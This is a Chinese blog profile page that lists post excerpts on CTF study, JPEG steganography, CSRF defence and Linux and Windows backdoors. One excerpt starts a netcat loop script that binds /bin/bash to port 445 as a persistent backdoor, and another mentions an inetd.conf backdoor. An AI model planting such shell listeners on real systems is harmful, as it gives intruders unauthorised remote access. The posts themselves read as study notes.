自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

d_0xff的博客

2016年4月14科比退役最后一战 我开始写下二进制博客 你的结束我的开始

  • 博客(10)
  • 资源 (2)
  • 收藏
  • 关注

转载 Linux后门初探二(利用 /etc/inetd.conf)

这个需要一定的条件在Ubuntu 这个测试 成功Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux这个需要的条件是开启inetd开启方式下载apt-get install openbsd-inetd直接输入dawg:~#

2016-05-28 03:57:53 6459

转载 Linux下后门初探(一)

在Linux下创建后门方式一默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。listener.sh 监听脚本#!/bin/bashwhile [ 1 ]; doecho -n | netcat -l -v -p 445 -e /bin/ba

2016-05-27 22:30:30 1686

转载 windows下盘符路径

%USERPROFILE% ——获取WINDOWS下当前用户路径%WINDIR% 是表示系统目录的系统变量%WINDIR% {系统目录 - C:\WINDOWS}%SYSTEMROOT% {系统目录 - C:\WINDOWS}%SYSTEMDRIVE% {系统根目录 - C:}%HOMEDRIVE%

2016-05-27 01:27:28 1014

转载 linux下搜索文件方式一

使用带正则表达式的grep命令!简单使用 在/etc/passwd中搜索vivekgrep vivek /etc/passwd不区分大小写grep -i -w vivek /etc/passwd不区分大小写的检索root 和 admingrep -i -w 'root|admin' /etc/passwd这个例子中就使用了正则表达式的模式固定检索内容的位置: 你可以使用 ^ 和 $ 符号强制一个正

2016-05-26 00:15:23 2053

转载 windows下后门技术(netcat篇)

由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一

2016-05-25 23:47:13 12130

原创 第一次CTF

第一次参加CTF 比赛 总结一些就是没有好好准备,如果做好了准备 拿第一太轻松了,比赛太紧张了 去了就开始蒙逼蒙逼循环蒙逼。这次太失败了,毕业了没有下次了。

2016-05-25 20:43:31 792

转载 JPEG图像格式Jphide隐写

0x00 隐写原理Jphide是基于最低有效位LSB的JPEG格式图像隐写算法,使用JPEG图像作为载体是因为相比其他图像格式更不容易发现隐藏信息,因为JPEG图像在DCT变换域上进行隐藏比空间域隐藏更难检测,并且鲁棒性更强,同时Blowfish算法有较强的抗统计检测能力。 由于JPEG图像格式使用离散余弦变换(Discrete Cosine Transform,DCT)函数来压缩图像,而这个图像

2016-05-17 04:52:05 6033

转载 关于python字符串的处理

关于python字符串的处理做CTF的时候想写一个Python的编码转换器,本来想十分钟搞定的结果写了俩小时,唉,浪费了好多时间环境python 2.7 + windows + CMD + pycharm 4.5我在CMD下运行C:\Users\Administrator>pythonPython 2.7 (r27:82525, Jul 4 2010, 07:43:08) [MSC v.1500

2016-05-16 00:42:10 4888

转载 CSRF的防御

wooyun大神的讲解 抄袭一遍加深一下记忆关于CSRF的防御 就要牢牢抓住几个特点1.跨域 2.伪造第一种跨域:我们发现CSRF的请求都是跨域的,针对这一点我们可以在服务端对HTTP请求的Referer字段进行检查。一般情况下,用户提交的都是站内的请求,其中Referer中的地址来源应该是站内的地址。至关重要的一点就是前端的JavaScript无法修改Referer字段。这也是这种方法成立的条件

2016-05-16 00:09:06 1006

转载 利用pyqt4写Python的图形化界面的笔记

利用pyqt4写Python的图形化界面的笔记在windows下搭建pyqt4的环境很简单但是在mac上我弄了很久也没有弄好下面开始记录一些笔记

2016-05-09 00:13:04 632

Xposed 框架官方例子

自己写的

2016-08-30

注入安卓进程,并hook java世界的方法

看雪大牛写的

2016-08-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除